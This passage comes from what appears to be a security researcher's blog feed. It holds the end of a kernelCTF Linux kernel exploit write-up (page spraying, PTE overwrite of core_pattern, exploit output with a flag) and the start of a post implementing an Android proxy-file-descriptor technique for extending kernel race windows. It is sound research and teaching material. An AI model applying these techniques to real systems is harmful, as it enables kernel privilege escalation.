        <span class="k">if</span> <span class="p">(</span><span class="n">sk</span><span class="o">-&gt;</span><span class="n">sk_route_caps</span> <span class="o">&amp;</span> <span class="n">NETIF_F_SG</span><span class="p">)</span>
            <span class="n">zc</span> <span class="o">=</span> <span class="n">MSG_SPLICE_PAGES</span><span class="p">;</span> <span class="c1">// [3]</span>
    <span class="p">}</span>
    <span class="c1">// [...]</span>

    <span class="k">while</span> <span class="p">(</span><span class="n">msg_data_left</span><span class="p">(</span><span class="n">msg</span><span class="p">))</span> <span class="p">{</span>
        <span class="n">skb</span> <span class="o">=</span> <span class="n">tcp_stream_alloc_skb</span><span class="p">(</span><span class="n">sk</span><span class="p">,</span> <span class="n">sk</span><span class="o">-&gt;</span><span class="n">sk_allocation</span><span class="p">,</span> <span class="n">first_skb</span><span class="p">);</span> <span class="c1">// [2]</span>

        <span class="c1">// [...]</span>
        <span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">zc</span> <span class="o">==</span> <span class="n">MSG_SPLICE_PAGES</span><span class="p">)</span> <span class="p">{</span>
            <span class="c1">// [...]</span>
            <span class="n">err</span> <span class="o">=</span> <span class="n">skb_splice_from_iter</span><span class="p">(</span><span class="n">skb</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">msg</span><span class="o">-&gt;</span><span class="n">msg_iter</span><span class="p">,</span> <span class="n">copy</span><span class="p">);</span> <span class="c1">// [4]</span>
            <span class="c1">// [...]</span>
            <span class="n">copy</span> <span class="o">=</span> <span class="n">err</span><span class="p">;</span>

            <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="p">(</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">MSG_NO_SHARED_FRAGS</span><span class="p">))</span>
                <span class="n">skb_shinfo</span><span class="p">(</span><span class="n">skb</span><span class="p">)</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">|=</span> <span class="n">SKBFL_SHARED_FRAG</span><span class="p">;</span>

            <span class="c1">// [...]</span>
        <span class="p">}</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The call flow from splice to <code class="language-plaintext highlighter-rouge">tcp_sendmsg_locked()</code> is as follows:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>__do_splice()
=&gt; do_splice()
 =&gt; out-&gt;f_op-&gt;splice_write()
  =&gt; splice_to_socket()
   =&gt; sock_sendmsg()
    =&gt; __sock_sendmsg()
     =&gt; inet_sendmsg()
      =&gt; tcp_sendmsg()
       =&gt; tcp_sendmsg_locked()
</code></pre></div></div>

<p>Thus, we can <strong>spray a large number of TCP sockets</strong> and <strong>splice six pages into each fragment array</strong>. After that, we free all of them so that one of the freed data buffers, still holding its stale <code class="language-plaintext highlighter-rouge">frags[]</code> entries, is eventually reused as the data buffer of <code class="language-plaintext highlighter-rouge">strp-&gt;anchor</code>.</p>
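<p>From userspace, getting pages into a socket through the splice path usually means going through a pipe. The helper below is a minimal sketch of that step, not the code from the actual exploit: <code class="language-plaintext highlighter-rouge">splice_pages_to_socket()</code> is a hypothetical name, and it assumes the requested pages fit into the default pipe capacity (16 pages).</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#define _GNU_SOURCE
#include &lt;fcntl.h&gt;
#include &lt;sys/uio.h&gt;
#include &lt;unistd.h&gt;

#define PAGE_SIZE 0x1000

/*
 * Move `npages` pages starting at `buf` into `sock_fd` through a pipe.
 * Returns 0 on success and -1 on failure.
 */
static int splice_pages_to_socket(int sock_fd, void *buf, size_t npages)
{
    int pfd[2];
    struct iovec iov = { .iov_base = buf, .iov_len = npages * PAGE_SIZE };
    ssize_t left = (ssize_t)iov.iov_len;
    int ret = -1;

    if (pipe(pfd) &lt; 0)
        return -1;

    /* Attach the user pages to the pipe. */
    if (vmsplice(pfd[1], &amp;iov, 1, 0) != left)
        goto out;

    /* Hand the pipe contents to the output fd's splice_write handler. */
    while (left &gt; 0) {
        ssize_t n = splice(pfd[0], NULL, sock_fd, NULL, (size_t)left, 0);

        if (n &lt;= 0)
            goto out;
        left -= n;
    }
    ret = 0;
out:
    close(pfd[0]);
    close(pfd[1]);
    return ret;
}
</code></pre></div></div>

<p>Calling this once per sprayed socket with six pages would correspond to the step described above; whether every page ends up as its own fragment depends on the kernel version and the socket's route capabilities.</p>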

<h3 id="32-spraying-pagetable">3.2. Spraying Pagetable</h3>

<p>After the pages are released, we reclaim them by <strong>spraying page tables</strong>. When the out-of-bounds access is triggered in <code class="language-plaintext highlighter-rouge">tls_strp_copyin_frag()</code> [1], packet data is copied into the page referenced by the stale fragment, and the copied content is under our control. This lets us <strong>overwrite a PTE</strong>.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">tls_strp_copyin_frag</span><span class="p">(</span><span class="k">struct</span> <span class="n">tls_strparser</span> <span class="o">*</span><span class="n">strp</span><span class="p">,</span> <span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span><span class="p">,</span>
                <span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">in_skb</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">offset</span><span class="p">,</span>
                <span class="kt">size_t</span> <span class="n">in_len</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// [...]</span>
    <span class="n">frag</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">skb_shinfo</span><span class="p">(</span><span class="n">skb</span><span class="p">)</span><span class="o">-&gt;</span><span class="n">frags</span><span class="p">[</span><span class="n">skb</span><span class="o">-&gt;</span><span class="n">len</span> <span class="o">/</span> <span class="n">PAGE_SIZE</span><span class="p">];</span>
    
    <span class="c1">// [...]</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">strp</span><span class="o">-&gt;</span><span class="n">stm</span><span class="p">.</span><span class="n">full_len</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">chunk</span> <span class="o">=</span> <span class="n">min_t</span><span class="p">(</span><span class="kt">size_t</span><span class="p">,</span> <span class="n">len</span><span class="p">,</span> <span class="n">PAGE_SIZE</span> <span class="o">-</span> <span class="n">skb_frag_size</span><span class="p">(</span><span class="n">frag</span><span class="p">));</span>
        <span class="n">WARN_ON_ONCE</span><span class="p">(</span><span class="n">skb_copy_bits</span><span class="p">(</span><span class="n">in_skb</span><span class="p">,</span> <span class="n">offset</span><span class="p">,</span> <span class="n">skb_frag_address</span><span class="p">(</span><span class="n">frag</span><span class="p">)</span> <span class="o">+</span> <span class="n">skb_frag_size</span><span class="p">(</span><span class="n">frag</span><span class="p">),</span> <span class="n">chunk</span><span class="p">));</span> <span class="c1">// [1]</span>
    <span class="p">}</span>

    <span class="c1">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Concretely, we add a new PTE pointing to <code class="language-plaintext highlighter-rouge">core_pattern[]</code> and overwrite it. Triggering a segmentation fault then causes the kernel to use the overwritten <code class="language-plaintext highlighter-rouge">core_pattern[]</code>, allowing us to retrieve the flag.</p>
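<p>As a rough illustration of what a crafted entry looks like, the sketch below builds an x86-64 PTE from a physical address using the architectural flag bits. The helper name <code class="language-plaintext highlighter-rouge">make_pte()</code> and the choice of flags are assumptions for illustration; the linked exploit may compute its entries differently, and the physical address of <code class="language-plaintext highlighter-rouge">core_pattern[]</code> has to be obtained separately.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include &lt;stdint.h&gt;

/* x86-64 page table entry bits. */
#define PTE_PRESENT   (1ULL &lt;&lt; 0)
#define PTE_RW        (1ULL &lt;&lt; 1)
#define PTE_USER      (1ULL &lt;&lt; 2)
#define PTE_ACCESSED  (1ULL &lt;&lt; 5)
#define PTE_DIRTY     (1ULL &lt;&lt; 6)
#define PTE_NX        (1ULL &lt;&lt; 63)
#define PTE_ADDR_MASK 0x000ffffffffff000ULL

/* Build a user-accessible, writable, non-executable PTE for a 4 KiB page. */
static uint64_t make_pte(uint64_t phys_addr)
{
    return (phys_addr &amp; PTE_ADDR_MASK) | PTE_PRESENT | PTE_RW | PTE_USER |
           PTE_ACCESSED | PTE_DIRTY | PTE_NX;
}
</code></pre></div></div>

<p>Writing such a value into a sprayed page table makes the corresponding user virtual address an alias of the chosen physical page, so an ordinary userspace write reaches kernel data.</p>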

<p>The exploit for lts-6.12.46 is <a href="/assets/kernelCTF-1day-0aeb54ac.c">here</a>. It works in the remote environment as well.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>user@lts-6:/tmp$ ./test
./test
[+] initialize
[+] spraying pagetable
[+] count: 0 (for populate pagetable)
[+] craft PTEs
[+] /proc/sys/kernel/core_pattern: |/proc/%P/fd/666 %P

[   19.574504] test[205]: segfault at 0 ip 0000000000402a19 sp 00007fff67f2a5d0 error 6 in test[2a19,401000+96000] likely on CPU 0 (core 0, socket 0)
[   19.578581] Code: 48 89 ce 89 c7 e8 77 35 02 00 48 8d 45 c0 48 89 c6 48 8d 05 51 4d 09 00 48 89 c7 b8 00 00 00 00 e8 5c 3f 00 00 b8 00 00 00 00 &lt;41
kernelCTF{v1:lts-6.12.46:1759486024:a15c6a431f0965768f9100391e6ebb695924f1f7}
[   19.603944] sysrq: Power Off
[   19.605689] ACPI: PM: Preparing to enter system sleep state S5
[   19.607641] kvm: exiting hardware virtualization
[   19.609214] reboot: Power down
</code></pre></div></div>]]></content><author><name></name></author><category term="Linux" /><summary type="html"><![CDATA[One day, @farazsth98 asked me if I had analyzed the latest 1-day kernelCTF slot. I hadn’t analyzed it yet, but I thought it was a good time to do something interesting — especially since preparing a talk is exhausting 😭.]]></summary></entry><entry><title type="html">Implementing KernelGP to Extend the Race Window</title><link href="https://u1f383.github.io/android/2025/09/24/Implementing-KernelGP-to-extend-the-race-window.html" rel="alternate" type="text/html" title="Implementing KernelGP to Extend the Race Window" /><published>2025-09-24T00:00:00+00:00</published><updated>2025-09-24T00:00:00+00:00</updated><id>https://u1f383.github.io/android/2025/09/24/Implementing-KernelGP-to-extend-the-race-window</id><content type="html" xml:base="https://u1f383.github.io/android/2025/09/24/Implementing-KernelGP-to-extend-the-race-window.html"><![CDATA[<p>The talk <a href="https://www.youtube.com/watch?v=DJBGu2fSSZg">KernelGP: Racing Against the Android Kernel</a> at OffensiveCon 2025 demonstrates four techniques to leverage Android’s internal design to extend the race window during kernel exploitation. In this post, I will walk through my exploration of the <strong>first method</strong> — <strong>the proxy file descriptor</strong> — and explain how I implemented it. I’ll also share some side notes on writing an Android app.</p>

<h2 id="1-jni">1. JNI</h2>

<h3 id="11-introduction">1.1. Introduction</h3>

<p>JNI (Java Native Interface) is an interface between Java/Kotlin applications and C/C++ libraries. It allows developers to write native libraries in C and load them into applications. This is very useful in exploit development, because applications are written in high-level languages that do not give us fine-grained control over low-level operations.</p>

<p>To write a library, you first need to <a href="https://developer.android.com/ndk/downloads?hl=zh-tw">download the NDK</a>. It includes toolchains for building libraries, most of which are pre-built, so no additional compilation is required. I used <code class="language-plaintext highlighter-rouge">android-ndk-r27d-linux.zip</code> in my virtual machine.</p>

<p>Once the archive is extracted, you can use the JNI APIs to write a library. For example, here is a <strong><code class="language-plaintext highlighter-rouge">hello.c</code></strong> that implements a simple JNI function returning the string <code class="language-plaintext highlighter-rouge">"Hello from C!"</code>:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include</span> <span class="cpf">&lt;jni.h&gt;</span><span class="cp">
</span>
<span class="n">JNIEXPORT</span> <span class="n">jstring</span> <span class="n">JNICALL</span>
<span class="nf">Java_com_example_myapplication_MainActivity_stringFromJNI</span><span class="p">(</span><span class="n">JNIEnv</span><span class="o">*</span> <span class="n">env</span><span class="p">,</span> <span class="n">jobject</span> <span class="n">thiz</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">return</span> <span class="p">(</span><span class="o">*</span><span class="n">env</span><span class="p">)</span><span class="o">-&gt;</span><span class="n">NewStringUTF</span><span class="p">(</span><span class="n">env</span><span class="p">,</span> <span class="s">"Hello from C!"</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The function name cannot be arbitrary; it must follow the JNI naming convention. The format is <strong><code class="language-plaintext highlighter-rouge">Java_&lt;package_name&gt;_&lt;class_name&gt;_&lt;method_name&gt;</code></strong>, with dots (<code class="language-plaintext highlighter-rouge">.</code>) in names replaced by underscores (<code class="language-plaintext highlighter-rouge">_</code>), and literal underscores (<code class="language-plaintext highlighter-rouge">_</code>) escaped as <code class="language-plaintext highlighter-rouge">_1</code>.</p>
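<p>The escaping rule is easy to get wrong by hand, so here is a small sketch that derives the symbol name. The helpers <code class="language-plaintext highlighter-rouge">jni_mangle_append()</code> and <code class="language-plaintext highlighter-rouge">jni_symbol()</code> are hypothetical names, and only the <code class="language-plaintext highlighter-rouge">.</code> and <code class="language-plaintext highlighter-rouge">_</code> cases are handled; other JNI escapes and overloaded methods are left out.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include &lt;stdio.h&gt;
#include &lt;string.h&gt;

/* Append `src` to the string in `dst`, mapping '.' to "_" and '_' to "_1". */
static void jni_mangle_append(char *dst, size_t cap, const char *src)
{
    size_t n = strlen(dst);

    /* Keep room for up to two output characters plus the terminator. */
    for (; *src &amp;&amp; n + 2 &lt; cap; src++) {
        if (*src == '.') {
            dst[n++] = '_';
        } else if (*src == '_') {
            dst[n++] = '_';
            dst[n++] = '1';
        } else {
            dst[n++] = *src;
        }
    }
    dst[n] = '\0';
}

/* Build the native symbol name for pkg.cls.method into `out`. */
static void jni_symbol(char *out, size_t cap, const char *pkg,
                       const char *cls, const char *method)
{
    snprintf(out, cap, "Java_");
    jni_mangle_append(out, cap, pkg);
    jni_mangle_append(out, cap, "."); /* separator becomes '_' */
    jni_mangle_append(out, cap, cls);
    jni_mangle_append(out, cap, ".");
    jni_mangle_append(out, cap, method);
}
</code></pre></div></div>

<p>For a package named <code class="language-plaintext highlighter-rouge">com.example.fuse_test</code>, a class <code class="language-plaintext highlighter-rouge">MainActivity</code>, and a method <code class="language-plaintext highlighter-rouge">mmapfuse</code>, the underscore in the package name turns into <code class="language-plaintext highlighter-rouge">_1</code> in the resulting symbol.</p>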

<p>The first two parameters are predefined: the <strong>JNI environment object (<code class="language-plaintext highlighter-rouge">env</code>)</strong> and the <strong>caller object (<code class="language-plaintext highlighter-rouge">thiz</code>)</strong>. The return type must be a Java-compatible type, such as <code class="language-plaintext highlighter-rouge">void</code>, <code class="language-plaintext highlighter-rouge">jboolean</code>, <code class="language-plaintext highlighter-rouge">jint</code>, <code class="language-plaintext highlighter-rouge">jstring</code>, etc.</p>

<p>To compile it, use the toolchain compiler with flags for building a shared object:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>~/android-ndk-r27d/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android34-clang <span class="nt">-shared</span> <span class="nt">-fPIC</span> <span class="nt">-o</span> libhello.so hello.c
</code></pre></div></div>

<p>Then, copy <code class="language-plaintext highlighter-rouge">libhello.so</code> to <code class="language-plaintext highlighter-rouge">~/path_to_your_application/app/src/main/jniLibs/arm64-v8a/</code>.</p>

<p>In the <code class="language-plaintext highlighter-rouge">com.example.myapplication</code> project, you need to add the attribute <strong><code class="language-plaintext highlighter-rouge">android:extractNativeLibs="true"</code></strong> in <code class="language-plaintext highlighter-rouge">AndroidManifest.xml</code> to ensure the application extracts native shared objects:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>&lt;application
    [...]
    android:extractNativeLibs="true"
&gt;
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">MainActivity</code> class then uses <code class="language-plaintext highlighter-rouge">System.loadLibrary()</code> to load the shared library. The file name must <strong>follow the format <code class="language-plaintext highlighter-rouge">"libXXXXX.so"</code></strong>, otherwise it will not be extracted and cannot be loaded. You also need to declare an external function for later use:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>init { System.loadLibrary("hello") }
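external fun stringFromJNI(): String
</code></pre></div></div>

<p>The declared name must match the method name at the end of the native symbol, which is <code class="language-plaintext highlighter-rouge">stringFromJNI</code> in <code class="language-plaintext highlighter-rouge">hello.c</code>. Now, you can call <code class="language-plaintext highlighter-rouge">stringFromJNI()</code> from <code class="language-plaintext highlighter-rouge">MainActivity</code>!</p>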

<h3 id="12-real-jni">1.2. Real JNI</h3>

<p>The actual library <strong><code class="language-plaintext highlighter-rouge">libfuse_mmap.so</code></strong> used to trigger FUSE is shown below:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include</span> <span class="cpf">&lt;jni.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;errno.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;string.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;unistd.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/mman.h&gt;</span><span class="cp">
</span>
<span class="kt">char</span> <span class="n">buf</span><span class="p">[</span><span class="mh">0x100</span><span class="p">];</span>
<span class="n">JNIEXPORT</span> <span class="n">jstring</span> <span class="n">JNICALL</span>
<span class="nf">Java_com_example_fuse_1test_MainActivity_mmapfuse</span><span class="p">(</span><span class="n">JNIEnv</span><span class="o">*</span> <span class="n">env</span><span class="p">,</span> <span class="n">jobject</span> <span class="n">thiz</span><span class="p">,</span> <span class="n">jint</span> <span class="n">fd</span> <span class="cm">/* [1] */</span><span class="p">)</span> <span class="p">{</span>
    <span class="kt">void</span><span class="o">*</span> <span class="n">ptr</span> <span class="o">=</span> <span class="n">mmap</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span> <span class="mh">0x1000</span><span class="p">,</span> <span class="n">PROT_READ</span><span class="p">,</span> <span class="n">MAP_SHARED</span><span class="p">,</span> <span class="n">fd</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span> <span class="c1">// [2]</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">ptr</span> <span class="o">==</span> <span class="n">MAP_FAILED</span><span class="p">)</span> <span class="p">{</span>
        <span class="kt">char</span> <span class="n">buf</span><span class="p">[</span><span class="mi">128</span><span class="p">];</span>
        <span class="n">snprintf</span><span class="p">(</span><span class="n">buf</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">buf</span><span class="p">),</span> <span class="s">"mmap failed: errno=%d (%s)"</span><span class="p">,</span> <span class="n">errno</span><span class="p">,</span> <span class="n">strerror</span><span class="p">(</span><span class="n">errno</span><span class="p">));</span>
        <span class="k">return</span> <span class="p">(</span><span class="o">*</span><span class="n">env</span><span class="p">)</span><span class="o">-&gt;</span><span class="n">NewStringUTF</span><span class="p">(</span><span class="n">env</span><span class="p">,</span> <span class="n">buf</span><span class="p">);</span>
    <span class="p">}</span>
    <span class="kt">char</span> <span class="n">buf</span><span class="p">[</span><span class="mh">0x10</span> <span class="o">+</span> <span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span><span class="mi">0</span><span class="p">};</span> <span class="c1">// zeroed, so the copied bytes stay NUL-terminated</span>
    <span class="n">memcpy</span><span class="p">(</span><span class="n">buf</span><span class="p">,</span> <span class="n">ptr</span><span class="p">,</span> <span class="mh">0x10</span><span class="p">);</span> <span class="c1">// [3]</span>
    <span class="k">return</span> <span class="p">(</span><span class="o">*</span><span class="n">env</span><span class="p">)</span><span class="o">-&gt;</span><span class="n">NewStringUTF</span><span class="p">(</span><span class="n">env</span><span class="p">,</span> <span class="n">buf</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>This native function backs the <code class="language-plaintext highlighter-rouge">mmapfuse()</code> method of the <code class="language-plaintext highlighter-rouge">MainActivity</code> class in the <code class="language-plaintext highlighter-rouge">com.example.fuse_test</code> package. It takes the FUSE file descriptor as a parameter [1] and maps it into the process address space with <code class="language-plaintext highlighter-rouge">mmap()</code> [2]. When <code class="language-plaintext highlighter-rouge">memcpy()</code> reads from the mapped memory [3], <strong>the resulting page fault is handled by the FUSE handler</strong>.</p>
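
<p>To try the mapping logic outside of Android, here is a minimal sketch that runs the same <code class="language-plaintext highlighter-rouge">mmap()</code> and <code class="language-plaintext highlighter-rouge">memcpy()</code> sequence against an ordinary temporary file instead of a FUSE fd. The helper name <code class="language-plaintext highlighter-rouge">read_via_mmap()</code> and the temporary file are assumptions for illustration only. With a regular file the kernel resolves the page fault without any userspace callback, so nothing blocks here.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include &lt;fcntl.h&gt;
#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;string.h&gt;
#include &lt;sys/mman.h&gt;
#include &lt;unistd.h&gt;

/* Copy the first 0x10 bytes of a read-only shared mapping of fd into out.
 * out must hold at least 0x10 + 1 bytes. Returns 0 on success, -1 on error. */
static int read_via_mmap(int fd, char *out) {
    void *ptr = mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, fd, 0);
    if (ptr == MAP_FAILED) {
        return -1;
    }
    memcpy(out, ptr, 0x10); /* the first touch faults the page in */
    out[0x10] = '\0';
    munmap(ptr, 0x1000);
    return 0;
}

int main(void) {
    /* Hypothetical stand-in for the FUSE fd: an ordinary temporary file. */
    char path[] = "/tmp/mmap_demo_XXXXXX";
    int fd = mkstemp(path);
    if (fd &lt; 0) { perror("mkstemp"); return 1; }
    unlink(path);

    const char data[] = "from FUSE callback :)";
    if (write(fd, data, sizeof(data) - 1) != (ssize_t)(sizeof(data) - 1)) {
        perror("write");
        return 1;
    }

    char buf[0x10 + 1];
    if (read_via_mmap(fd, buf) != 0) { perror("mmap"); return 1; }
    printf("%s\n", buf);
    close(fd);
    return 0;
}
</code></pre></div></div>

<p>This sketch prints <code class="language-plaintext highlighter-rouge">from FUSE callba</code>, the first 0x10 bytes of the payload.</p>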

<h2 id="2-app">2. App</h2>

<p>The following is the source code of the application <strong><code class="language-plaintext highlighter-rouge">com.example.fuse_test</code></strong>. I will explain it line by line.</p>

<div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">class</span> <span class="nc">MainActivity</span> <span class="o">:</span> <span class="nc">ComponentActivity</span><span class="o">()</span> <span class="o">{</span>
    <span class="c1">// =============== [1] ===============</span>
    <span class="n">init</span> <span class="o">{</span> <span class="nc">System</span><span class="o">.</span><span class="na">loadLibrary</span><span class="o">(</span><span class="s">"fuse_mmap"</span><span class="o">)</span> <span class="o">}</span>
    <span class="n">external</span> <span class="n">fun</span> <span class="nf">mmapfuse</span><span class="o">(</span><span class="nl">fuseFd:</span> <span class="nc">Int</span><span class="o">):</span> <span class="nc">String</span>
    <span class="c1">// ===================================</span>

    <span class="n">override</span> <span class="n">fun</span> <span class="nf">onCreate</span><span class="o">(</span><span class="nl">savedInstanceState:</span> <span class="nc">Bundle</span><span class="o">?)</span> <span class="o">{</span> <span class="c1">// [2]</span>
        <span class="kd">super</span><span class="o">.</span><span class="na">onCreate</span><span class="o">(</span><span class="n">savedInstanceState</span><span class="o">)</span>
        <span class="n">setContent</span> <span class="o">{</span>
            <span class="c1">// =============== [3] ===============</span>
            <span class="kt">var</span> <span class="n">output</span> <span class="n">by</span> <span class="n">remember</span> <span class="o">{</span> <span class="n">mutableStateOf</span><span class="o">(</span><span class="s">"running..."</span><span class="o">)</span> <span class="o">}</span>
            <span class="kt">var</span> <span class="n">fusePfd</span> <span class="n">by</span> <span class="n">remember</span> <span class="o">{</span> <span class="n">mutableStateOf</span><span class="o">&lt;</span><span class="nc">ParcelFileDescriptor</span><span class="o">?&gt;(</span><span class="kc">null</span><span class="o">)</span> <span class="o">}</span>
            <span class="kt">var</span> <span class="n">callbackThread</span> <span class="n">by</span> <span class="n">remember</span> <span class="o">{</span> <span class="n">mutableStateOf</span><span class="o">&lt;</span><span class="nc">HandlerThread</span><span class="o">?&gt;(</span><span class="kc">null</span><span class="o">)</span> <span class="o">}</span>
            <span class="kt">var</span> <span class="n">callbackHandler</span> <span class="n">by</span> <span class="n">remember</span> <span class="o">{</span> <span class="n">mutableStateOf</span><span class="o">&lt;</span><span class="nc">Handler</span><span class="o">?&gt;(</span><span class="kc">null</span><span class="o">)</span> <span class="o">}</span>
            <span class="c1">// ===================================</span>

            <span class="nc">LaunchedEffect</span><span class="o">(</span><span class="nc">Unit</span><span class="o">)</span> <span class="o">{</span> <span class="c1">// [4]</span>
                <span class="n">callbackThread</span> <span class="o">=</span> <span class="nc">HandlerThread</span><span class="o">(</span><span class="s">"ProxyFDCallbacks"</span><span class="o">).</span><span class="na">apply</span> <span class="o">{</span> <span class="n">start</span><span class="o">()</span> <span class="o">}</span> <span class="c1">// [6]</span>
                <span class="n">callbackHandler</span> <span class="o">=</span> <span class="nc">Handler</span><span class="o">(</span><span class="n">callbackThread</span><span class="o">!!.</span><span class="na">looper</span><span class="o">)</span>
                <span class="n">val</span> <span class="n">data</span> <span class="o">=</span> <span class="s">"from FUSE callback :)"</span><span class="o">.</span><span class="na">toByteArray</span><span class="o">(</span><span class="nc">Charsets</span><span class="o">.</span><span class="na">UTF_8</span><span class="o">)</span>
                <span class="n">val</span> <span class="n">sm</span> <span class="o">=</span> <span class="n">getSystemService</span><span class="o">(</span><span class="no">STORAGE_SERVICE</span><span class="o">)</span> <span class="n">as</span> <span class="nc">StorageManager</span> <span class="c1">// [7]</span>
                
                <span class="n">fusePfd</span> <span class="o">=</span> <span class="n">sm</span><span class="o">.</span><span class="na">openProxyFileDescriptor</span><span class="o">(</span> <span class="c1">// [8]</span>
                    <span class="nc">ParcelFileDescriptor</span><span class="o">.</span><span class="na">MODE_READ_ONLY</span><span class="o">,</span>
                    <span class="nc">FuseCallback</span><span class="o">(</span><span class="n">data</span><span class="o">),</span>
                    <span class="n">callbackHandler</span>
                <span class="o">)</span>
                <span class="n">output</span> <span class="o">=</span> <span class="n">mmapfuse</span><span class="o">(</span><span class="n">fusePfd</span><span class="o">!!.</span><span class="na">fd</span><span class="o">)</span> <span class="c1">// [11]</span>
            <span class="o">}</span>

            <span class="nc">Scaffold</span><span class="o">(</span><span class="n">modifier</span> <span class="o">=</span> <span class="nc">Modifier</span><span class="o">.</span><span class="na">fillMaxSize</span><span class="o">())</span> <span class="o">{</span> <span class="n">innerPadding</span> <span class="o">-&gt;</span>
                <span class="nc">Text</span><span class="o">(</span><span class="n">output</span><span class="o">,</span> <span class="n">modifier</span> <span class="o">=</span> <span class="nc">Modifier</span><span class="o">.</span><span class="na">padding</span><span class="o">(</span><span class="n">innerPadding</span><span class="o">))</span> <span class="c1">// [12]</span>
            <span class="o">}</span>

            <span class="nc">DisposableEffect</span><span class="o">(</span><span class="nc">Unit</span><span class="o">)</span> <span class="o">{</span> <span class="c1">// [5]</span>
                <span class="n">onDispose</span> <span class="o">{</span>
                    <span class="k">try</span> <span class="o">{</span> <span class="n">fusePfd</span><span class="o">?.</span><span class="na">close</span><span class="o">()</span> <span class="o">}</span> <span class="k">catch</span> <span class="o">(</span><span class="nl">_:</span> <span class="nc">Exception</span><span class="o">)</span> <span class="o">{}</span>
                    <span class="n">callbackThread</span><span class="o">?.</span><span class="na">quitSafely</span><span class="o">()</span>
                <span class="o">}</span>
            <span class="o">}</span>
        <span class="o">}</span>
    <span class="o">}</span>
<span class="o">}</span>

<span class="kd">class</span> <span class="nf">FuseCallback</span><span class="o">(</span><span class="kd">private</span> <span class="n">val</span> <span class="nl">data:</span> <span class="nc">ByteArray</span><span class="o">)</span> <span class="o">:</span> <span class="nc">ProxyFileDescriptorCallback</span><span class="o">()</span> <span class="o">{</span> <span class="c1">// [9]</span>
    <span class="n">override</span> <span class="n">fun</span> <span class="nf">onGetSize</span><span class="o">():</span> <span class="nc">Long</span> <span class="o">=</span> <span class="n">data</span><span class="o">.</span><span class="na">size</span><span class="o">.</span><span class="na">toLong</span><span class="o">()</span>
    <span class="n">override</span> <span class="n">fun</span> <span class="nf">onRead</span><span class="o">(</span><span class="nl">offset:</span> <span class="nc">Long</span><span class="o">,</span> <span class="nl">size:</span> <span class="nc">Int</span><span class="o">,</span> <span class="nl">dst:</span> <span class="nc">ByteArray</span><span class="o">):</span> <span class="nc">Int</span> <span class="o">{</span>
        <span class="k">if</span> <span class="o">(</span><span class="n">offset</span> <span class="o">&lt;</span> <span class="mi">0</span> <span class="o">||</span> <span class="n">size</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="o">)</span> <span class="k">throw</span> <span class="nc">ErrnoException</span><span class="o">(</span><span class="s">"onRead"</span><span class="o">,</span> <span class="nc">OsConstants</span><span class="o">.</span><span class="na">EINVAL</span><span class="o">)</span>
        <span class="k">if</span> <span class="o">(</span><span class="n">offset</span> <span class="o">&gt;=</span> <span class="n">data</span><span class="o">.</span><span class="na">size</span><span class="o">)</span> <span class="k">return</span> <span class="mi">0</span>
        <span class="n">val</span> <span class="n">n</span> <span class="o">=</span> <span class="n">minOf</span><span class="o">(</span><span class="n">size</span><span class="o">,</span> <span class="n">data</span><span class="o">.</span><span class="na">size</span> <span class="o">-</span> <span class="n">offset</span><span class="o">.</span><span class="na">toInt</span><span class="o">())</span>
        <span class="nc">System</span><span class="o">.</span><span class="na">arraycopy</span><span class="o">(</span><span class="n">data</span><span class="o">,</span> <span class="n">offset</span><span class="o">.</span><span class="na">toInt</span><span class="o">(),</span> <span class="n">dst</span><span class="o">,</span> <span class="mi">0</span><span class="o">,</span> <span class="n">n</span><span class="o">)</span>
